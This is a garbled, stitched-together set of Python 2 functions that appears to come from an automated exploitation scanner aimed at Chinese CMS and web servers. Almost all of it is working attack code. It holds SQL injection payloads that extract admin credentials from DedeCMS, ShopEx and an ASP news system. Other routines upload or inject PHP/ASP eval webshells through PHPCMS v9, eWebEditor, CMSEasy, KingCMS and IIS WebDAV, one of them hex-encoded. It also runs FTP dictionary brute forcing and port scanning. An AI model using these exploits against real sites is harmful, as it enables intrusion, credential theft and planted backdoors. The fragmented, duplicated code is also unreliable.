def three(self,arg,path):
try:
site = path+'/plus/long.php'
testsite = path+'/plus/shaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhao.php'
httpres = self.request(arg,site)
code = None
testcode = None
testhttpres = self.request(arg,testsite)
if testhttpres:
testcode = testhttpres.status #返回值
if httpres:
code = httpres.status #返回值
if code != testcode: #不相等为有效
#print u' \nGood,write OK ! Shell :%s%s pass:long' % (arg,site)
if yijuhua_cs("php",arg+site,"long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list=[1,self.url0,self.url1,"CN_exp_dedecms_getshell",arg.strip()+site,"long","webshell"]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list,0.5) #插入队列
else:
#否
EXP_list=[0,self.url0,self.url1,"CN_exp_dedecms_getshell",arg.strip()+site,"long","webshell"]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list,0.5) #插入队列
# print "exp_dedecms_getshell---%s---%s"%(arg.strip()+site,"webshell--pass:guige")
else:
#print u' \n亲,你点真背,不存在漏洞!'
return 0
return 0
except Exception,e:
#print e
return 0
def one(self, arg):
try:
url = arg + '/?product-gnotify'
#定义要提交的数据
html = '1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators limit 0,1'
data = {"goods[goods_id]": '3', "goods[product_id]": html}
h = httplib2.Http('.cache')
response, content = h.request(
url,
'POST',
urlencode(data),
headers={'Content-Type': 'application/x-www-form-urlencoded'})
gre = re.compile(r'\$\^(.+)?\^\$')
s = content
lpwd = gre.findall(s)
if len(lpwd) == 1:
#pwd=lpwd[0]
#print url+"\n"+pwd+"\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"
EXP_list = [
1, self.url, "bc", "CN_bc_shopex_4_8_5", url, lpwd[0], "",
""
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
else:
pass
return 1
except Exception, e:
#print e
return 0
def scan(self,URL):
try:
tj_data1=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\'`+]=a"
ss=self.open_url_data(tj_data1)
if ss==0: #读取网页内容
return 0
pname = re.compile( r'Error infos: Duplicate entry \'(.*?)\' for key')
sarr = pname.findall(ss)
if sarr:
#print sarr[0]
EXP_list=[1,self.url,"bc","CN_bc_dedecms_search_php1",URL+"/plus/search.php",sarr[0],""]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","
url_exp.put(EXP_list,0.5) #插入队列
tj_data1=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\'`+]=a"
ss=self.open_url_data(tj_data1)
if ss==0: #读取网页内容
return 0
pname = re.compile( r'Error infos: Duplicate entry \'(.*?)\' for key' )
sarr = pname.findall(ss)
if sarr:
#print sarr[0]
EXP_list=[1,self.url,"bc","CN_bc_dedecms_search_php2",URL+"/plus/search.php",sarr[0],""]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","
url_exp.put(EXP_list,0.5) #插入队列
except:
pass
def find(self, arg):
site = '/plus/dst.php'
heareds = {
"User-Agent":
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
}
conn = httplib.HTTPConnection(arg)
try:
conn.request('GET', site, None, heareds)
httpres = conn.getresponse()
if httpres.status == 200:
data = 'http://%s/plus/dst.php' % arg
print data
if yijuhua_cs("php", data, "cmd"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, self.url0, self.url1, "CN_exp_dedecms_yijuhua",
data, "cmd", "webshell"
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, self.url0, self.url1, "CN_exp_dedecms_yijuhua",
data, "cmd", "webshell"
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
url_exp.put(EXP_list, 0.5) #插入队列
# print "exp_dedecms_yijuhua---%s---%s"%(data,"webshell--pass:cmd")
except Exception, e:
#print e
return False
def one(self, arg):
try:
url = arg + "/uploads/plus/search.php?keyword=11&typeArr[%60@%27%60and%28SELECT%201%20FROM%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29%20from%20dede_admin%20Limit%200,1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29]=1"
req = urllib2.Request(url)
res = urllib2.urlopen(req)
html = res.read()
res.close()
#print html
html = re.findall(r"Duplicate entry \'\w+'", html)
if html:
#print "OK-----------------success"
#print html[0]
EXP_list = [
1, self.url0, self.url1, "CN_sql_dede_57_sp1X1", html[0],
"", ""
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
return 1
else:
#print "no sql injection"
return 0
except Exception, e:
#print e
return 0
def ewebeditor_asp(self, arg): #
try:
url = arg + "/jms/edit/Upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a"
files = {'uploadfile': open("long.asp.cer", "rb")}
r = requests.post(url, files=files)
data = r.text
#print data
p = re.compile(r"parent.UploadSaved\('(.*?)'\)")
sarr = p.findall(data) #找出一条
name = sarr[0]
#print name
url = "%s/jms/edit/uploadfile/%s" % (arg, name)
if yijuhua_cs("asp", url, "long"): #ASP还是PHP ,URL地址 ,密码
#print url+"OK"
EXP_list = [
1, self.url0, self.url1, "CN_exp_ewebeditor_Upload_asp",
url, "long", "webshell"
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
url_exp.put(EXP_list, 0.5) #插入队列
else:
#print url+"NO"
EXP_list = [
0, self.url0, self.url1, "CN_exp_ewebeditor_Upload_asp",
url, "long", "webshell"
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
url_exp.put(EXP_list, 0.5) #插入队列
except Exception, e:
#print e
return 0
def getshell(self,arg):
try:
headers = {'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}
#data = "test<?php @eval($_POST[\''.'shaoxiao'.'\']);?>'"
data="<?php @eval($_POST['long']);?>"
url = arg.split('//')[1]
site = '/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file='+self.url1+'/uploadfile/1222.thumb_.Php.JPG%20%20%20%20%20%20%20Php'
conn = httplib.HTTPConnection(url)
conn.request('POST',site,data,headers)
httpres = conn.getresponse()
html = httpres.read()
#print html
if httpres.status == 200 and html:
gets = re.compile('http://(.*?)\.Php\.JPG\s')
get = gets.findall(html)
if get:
data='http://'+get[0]+'.Php.JPG%20%20%20%20%20%20%20Php' #Pass:long
if yijuhua_cs("php",data,"long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list=[1,self.url0,self.url1,"CN_exp_phpcmsv9_getshell",data,"long","webshell"]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list,0.5) #插入队列
else:
#否
EXP_list=[0,self.url0,self.url1,"CN_exp_phpcmsv9_getshell",data,"long","webshell"]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list,0.5) #插入队列
#print "exp_phpcmsv9_getshell---%s---%s"%(data,"webshell--pass:long")
return 1
except Exception,e:
#print e
return 0
def scan(self, arg):
url0, url1 = arg
url = url1.split('//')[1]
if not self.getcss(url1):
css = 'index.html' + '%00.php'
else:
css = self.getcss(url1) + '%00.php'
site = '''/plus/carbuyaction.php?dopost=return&code=../../%s''' % css
headers = {
"User-Agent":
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"cookie": "code=alipay"
}
conn = httplib.HTTPConnection(url)
try:
conn.request('GET', site, None, headers)
httpres = conn.getresponse()
html = httpres.read()
if (httpres.status
== 200) and (len(html) > 0) and html[:6] != '<html>':
url = "%s%s" % (url1, site)
EXP_list = [1, url0, url1, "CN_bc_DedeCms_5x", url, "", ""]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
except:
pass
def scan(self, arg):
url = arg+'/search.php?query=shaoxiao%27%3B%3F%3E%3C%3F%66%70%75%74%73%28%66%6F%70%65%6E%28%27%53' \
'%74%79%6C%65%2E%70%68%70%27%2C%27%77%27%29%2C%62%61%73%65%36%34%5F%64%65%63%6F%64%65%28%' \
'27%4D%54%45%78%50%44%39%77%61%48%41%67%51%47%56%32%59%57%77%6F%4A%46%39%51%54%31%4E%55%57' \
'%79%64%6A%62%57%51%6E%58%53%6B%37%50%7A%34%79%4D%6A%49%3D%27%29%29%3B%3F%3E%26%6D%6F%64%65%' \
'6C%69%64%3D%31%20%6F%72%20%32%3D%32'
#UrlDecode解码
shellurl = arg + '/Style.php'
try:
html = urllib2.urlopen(url).read()
#print html
if 'shaoxiao' in html:
shellhtml = urllib2.urlopen(shellurl).read()
if '111222' in shellhtml:
if yijuhua_cs("php", shellurl,
"cmd"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, self.url, "exp", "CN_exp_kingcms_getshell",
shellurl, "cmd", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, self.url, "exp", "CN_exp_kingcms_getshell",
shellurl, "cmd", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
#print "exp_kingcms_getshell---%s---%s"%(shellurl,"webshell--pass:cmd")
except Exception, e:
#print e
return 0
def scan(self, arg):
try:
opener = urllib2.build_opener(UPLOAD.MultipartPostHandler)
params = {"fileToUpload": open("long.php;.jpg", "rb")}
url = arg + '/celive/live/doajaxfileupload.php'
req = opener.open(url, params)
html = req.read()
murl = re.compile("<a href='(.*?)'")
ok = murl.findall(html)
print ok
if ok and '.php;.jpg' in ok[0]:
if yijuhua_cs("php", ok[0], "long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, self.url, "exp", "CN_exp_etcms_Upload_shell", ok[0],
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, self.url, "exp", "CN_exp_etcms_Upload_shell", ok[0],
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
# print "exp_kingcms_getshell---%s---%s"%(ok[0],"webshell--pass:long")
except Exception, e:
print e
pass
def rfid_list(self): #读取数组
try:
for i in self.list_http:
#print i
EXP_list=[1,self.penurl,"http_200","http_200",i,"","http+200"]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list,0.5) #插入队列
except Exception,e:
print e
return 0
def run(self):
MAX_RETRIES = 5
retry = 0
account = None #None=NULL 数组
while self.running and accounts: #list数组
try:
self.ftp.connect(Adomain, port) #连接 服务器名 端口号
except Exception, e:
if retry <= MAX_RETRIES: #这是为了控制线程吗
retry = retry + 1 #没必要使用这个变量啊
continue #跳过
else:
self.running = False #这是 控制线程
break #跳出
#print ".",
#重新每三次 为什么一个账户要连接3次 呢
loop_num = 0
while loop_num < 3:
loop_num = loop_num + 1
if not account and accounts: #list数组
account = accounts.pop() #list数组 输出
#绝对不要尝试
if not account: #数组无数据了就跳出
break #跳出
#print u'IP:',host,u'用户名:',account[0],u'密码:',account[1]
try:
self.ftp.login(account[0], account[1]) #连接FTP
#没有异常发生,这是一个正确的帐号
# u_data="-CS_linkftp-FTP OK-IP:%s user:%s password:%s time:%s"%\
# (host,account[0],account[1],time.strftime('%Y.%m.%d-%H.%M.%S'))
# print u_data
EXP_list = [
1, host, "FTP", "user:"******"",
"password:"******"", "", ""
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
time.sleep(0.1)
account = None #None=NULL self.sql.
except Exception, e:
emsg = str(e) #调试信息
if 'connection' in emsg.lower(
) or 'tries' in emsg.lower(
): #判断 连接 失败错误信息 不明白何意
retry = retry + 1
break #跳出
else:
#reset retry
account = None #None=NULL
retry = 0
def scan(url,ip,port):
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect((ip,port))
result=s.connect_ex((ip,port))
if(result==0):
print 'url:%s IP:%s:%d open'%(url,ip,port)
EXP_list=[1,url,"url:port","socket_port",str(port)+" open","",""]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list,0.5) #插入队列
s.close()
except:
return 0
def rfid_list(self): #读取数组
try:
for i in self.list_http:
#print i
EXP_list = [
1, self.penurl[0], self.penurl[1], "http_200", i, "", ""
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
url_exp.put(EXP_list, 0.5) #插入队列
except Exception, e:
print e
return 0
def rfid_list(self): #读取数组
try:
for i in self.list_download:
#print i
# EXP_list=[1,self.penurl,"http_download","http_download",i,"","http+download"]
# #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
# url_exp.put(EXP_list,0.5) #插入队列
EXP_list=[1,self.penurl[0],self.penurl[1],"http_download",i,"",""]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list,0.5) #插入队列
except Exception,e:
print e
return 0
def one2(self,arg):
try:
html = urllib2.urlopen(arg+'/plus/search.php?keyword=as&typeArr%5B1%20%75%4E%69%6F%6E%201%5D=a',timeout=5).read()
if html:
r = r"<font size='5' color='red'>(.*?)</font>"
m = re.findall(r,html)
if m:
#print 'search_php Sqlinjection'+m[0]
EXP_list=[1,self.url,"sql","CN_sql_dede_57_sp1X2",m[0],"",""]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list,0.5) #插入队列
return 0
except Exception,e:
#print e
return 0
def for_list(self):
try:
for i in self.list:
#print i
if self.open_url_cms(self.URL,i[0],i[1]): #url 地址 版本
#print u"网址:%s 链接:%s 关键字:%s 版本:%s"%(self.URL,i[0],i[1],i[1])
#list=[self.URL,i[1]]
#print list
EXP_list=[1,self.url0,self.URL,"cms",i[1],"",""]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
url_exp.put(EXP_list,0.5) #插入队列
break #跳出整个循环
except Exception,e:
#print e
return 0
class CS_linkftp(threading.Thread):
def __init__(self, openurl):
threading.Thread.__init__(self)
self.Internet = 10 #控制到300次检测一次网络状态
self.openftp = openurl[7:]
#self.Chost="" #主机地址
self.ftp_login(self.openftp)
WEAK_USERNAME = [
p.replace('\n', '') for p in open('username.dic').readlines()
]
WEAK_PASSWORD = [
p.replace('\n', '') for p in open('password.dic').readlines()
]
def get_sdomain(self, domain): #域名拆解www.baidu.com->baidu.com
suffixes = 'ac', 'ad', 'ae', 'aero', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao', 'aq', 'ar', 'arpa', 'as', 'asia', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb', 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'biz', 'bj', 'bm', 'bn', 'bo', 'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cat', 'cc', 'cd', 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'com', 'coop', 'cr', 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 'dz', 'ec', 'edu', 'ee', 'eg', 'er', 'es', 'et', 'eu', 'fi', 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gov', 'gp', 'gq', 'gr', 'gs', 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie', 'il', 'im', 'in', 'info', 'int', 'io', 'iq', 'ir', 'is', 'it', 'je', 'jm', 'jo', 'jobs', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn', 'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me', 'mg', 'mh', 'mil', 'mk', 'ml', 'mm', 'mn', 'mo', 'mobi', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'name', 'nc', 'ne', 'net', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om', 'org', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr', 'pro', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru', 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj', 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td', 'tel', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug', 'uk', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi', 'vn', 'vu', 'wf', 'ws', 'xn', 'ye', 'yt', 'za', 'zm', 'zw'
sdomain = []
bdomain = False
for section in domain.split('.'):
if section in suffixes:
sdomain.append(section)
bdomain = True
else:
sdomain = [section]
return '.'.join(sdomain) if bdomain else ''
def get_ssdomain(self, domain): #域名拆解www.baidu.com->baidu
sdomain = self.get_sdomain(domain) #先解析一道
ssdomian = sdomain.partition('.')[0] if sdomain else ''
return ssdomian
def ftp_login(self, host, nthreads=10, port=21): #传入名域名开始扫描
#尝试登录 if success return username & password
#print u"要扫描IP:",host,
#self.A= int(time.strftime('%H%M%S'))
try: #是否能链接上FTP
ftpA = FTP() #初始化FTP类
ftpA.connect(host, port) #连接 服务器名 端口号
except Exception, e:
print e
return 0
try: #判断是否为匿名账户 #anonymous 密码为空属于匿名账户
ftpA = FTP() #初始化FTP类
ftpA.connect(host, port) #连接 服务器名 端口号
ftpA.login("anonymous", "") #连接FTP
EXP_list = [
1, host, "FTP", "user:anonymous", "password:"******"", "niming"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
return 0
except Exception, e:
pass
def socket_80(self, url):
try:
port = 80
ip = socket.gethostbyname(url) #www.51jmyj.com
data = "OPTIONS / HTTP/1.1\nHost:%s\r\n\r\n" % (
ip) #OPTIONS返回服务器的各种信息
OPTIONS = self.socket_sendall(ip, port, data)
p = re.compile(
r'(Server:.*?)(\n)') #(Server):(.*?)(?:\n) (Server:.*?)(\n)
sarr = p.findall(OPTIONS)
data = sarr[0][0]
if data == "":
return 0
EXP_list = [1, url, "socket_port80", "socket_port80", data, "", ""]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
print "url:%s port80:%s" % (url, data)
except:
return 0
def one(self, arg):
try:
URL = arg + "/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='"
ss = self.open_url_data(URL)
if ss == 0: #读取网页内容
return 0
p = re.compile(r'<a.+?href=\\"shownews.asp.+?>(.+?)</a></span>')
sarr = p.findall(ss)
if "|" in sarr[0]:
EXP_list = [
1, self.url, "bc", "CN_bc_nfsj_jlxt_wrtx",
arg + "/NewsType.asp", sarr[0], ""
]
print EXP_list
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
except Exception, e:
#print e
return 0
def IIS_webdav(self, url, port=80): #iis 写入漏洞 IIS webdav
try:
self.txt = '/test.txt'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_ip = socket.gethostbyname(url)
s.connect((remote_ip, port))
message = "OPTIONS / HTTP/1.1\r\nHost: %s\r\n\r\n" % url
s.sendall(message)
reply = s.recv(1024)
if 'DAV' in reply:
#print 'Webdav Is Vulnerable! Try To Hacking....'
if self.put(url, self.txt):
data = "http://%s/%s" % (url, self.txt)
#print "exp_IISwebdav_put---%s---%s"%(data,"webshell--pass:long")
EXP_list = [
1, url, "exp", "exp_IISwebdav_put", data, "", ""
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
MOVE_asp = self.sjzf() #随机文件名
MOVE_asp += ".asp;jpg"
moveheaders = {
'User-Agent':
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Destination': 'http://%s/%s' % (url.strip(), MOVE_asp)
}
if self.move(url, self.txt, moveheaders):
data = "http://%s/%s" % (url.strip(), MOVE_asp)
if yijuhua_cs("asp", data,
"long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, url, "exp", "exp_IISwebdav_move", data,
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
#print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, url, "exp", "UAS_exp_IISwebdav_move", data,
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
#print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
# print "exp_IISwebdav_move---%s---%s"%(data,"webshell--pass:long")
#else:
# print 'Webdav Is No Vulnerable!'
return 0
except Exception, e:
#print e
return 0
def scan(self, arg):
try:
url0, url1 = arg
#http://www.skyscom.com/celive/live/doajaxfileupload.php
data = "%s/celive/live/doajaxfileupload.php" % (url1)
if 'jpg' in self.URL_DZ(data): #检查是否支持JPG
EXP_list = [
1, url0, url1, "CN_exp_cmseasy_IIS6_jx_JPG", data, "", ""
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
url_exp.put(EXP_list, 0.5) #插入队列
#上传文件
#data="<?php @eval($_POST['long']);?>" #一句话
files = {'fileToUpload': open('long.php;.jpg', 'rb')}
r = requests.post(data, files=files)
data = r.text
name = []
try:
p = re.compile(r'target=.+?>(.*?)</a>'
) #结果 [u'CELIVE-Q7duV0tNj8.php;.jpg']
sarr = p.findall(data) #找出一条
name = sarr[0]
except:
#print "!"
return 0
#print name
data = "%s/celive/uploadfiles/%s" % (url1, name)
if self.http_get(
url1.split('//')[1],
"/celive/uploadfiles/" + name): #验证地址是否存在
if yijuhua_cs("php", data, "long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, url0, url1, "CN_exp_cmseasy_IIS6_jx", data,
"long", "webshell"
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, url0, url1, "CN_exp_cmseasy_IIS6_jx", data,
"long", "webshell"
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
#print EXP_list
url_exp.put(EXP_list, 0.5) #插入队列
except Exception, e:
#print e
return 0
def cmseasy_IIS6_jx(self, url): #cmseasy文件上传+IIS6解释漏洞
try:
#http://www.skyscom.com/celive/live/doajaxfileupload.php
data = "%s/celive/live/doajaxfileupload.php" % (url)
if 'jpg' in self.URL_DZ(data): #检查是否支持JPG
#print "-cms-cmseasy_IIS6_jx-open jpg %s"%(data)
EXP_list = [0, url, "exp", "exp_cmseasy_IIS6_jx", data, "", ""]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
#上传文件
#data="<?php @eval($_POST['long']);?>" #一句话
files = {'fileToUpload': open('long.php;.jpg', 'rb')}
r = requests.post(data, files=files)
data = r.text
name = []
try:
p = re.compile(r'target=.+?>(.*?)</a>'
) #结果 [u'CELIVE-Q7duV0tNj8.php;.jpg']
sarr = p.findall(data) #找出一条
name = sarr[0]
except:
#print "!"
return 0
#print name
data = "%s/celive/uploadfiles/%s" % (url, name)
if self.http_get(url[7:],
"/celive/uploadfiles/" + name): #验证地址是否存在
if yijuhua_cs("php", data, "long"): #ASP还是PHP ,URL地址 ,密码
#是
EXP_list = [
1, url, "exp", "CN_exp_cmseasy_IIS6_jx", data,
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
else:
#否
EXP_list = [
0, url, "exp", "CN_exp_cmseasy_IIS6_jx", data,
"long", "webshell"
]
#["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个
url_exp.put(EXP_list, 0.5) #插入队列
except Exception, e:
#print e
return 0
ftpA = FTP() #初始化FTP类
ftpA.connect(host, port) #连接 服务器名 端口号
except Exception, e:
print e
return 0
try: #判断是否为匿名账户 #anonymous 密码为空属于匿名账户
ftpA = FTP() #初始化FTP类
ftpA.connect(host, port) #连接 服务器名 端口号
ftpA.login("anonymous", "") #连接FTP
EXP_list = [
1, self.openurl[0], host, "FTP", "user:anonymous:password:"******"", "niming"
]
#["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个
url_exp.put(EXP_list, 0.5) #插入队列
return 0
except Exception, e:
pass
#print u"要扫描IP:",host,
Adomain = host #域名www.baidu.com
Bdomain = self.get_sdomain(Adomain) #域名拆解www.baidu.com->baidu.com
Cdomain = self.get_ssdomain(Adomain) #域名拆解www.baidu.com->baidu
Ddomain = "" #域名拆解www.baidu.com->wwwbaiducom
for i, j in {'.': ''}.iteritems(): #去.符号
Ddomain = Adomain.replace(i, j)
###################################
accounts = deque() #list数组
#准备 用户名和密码
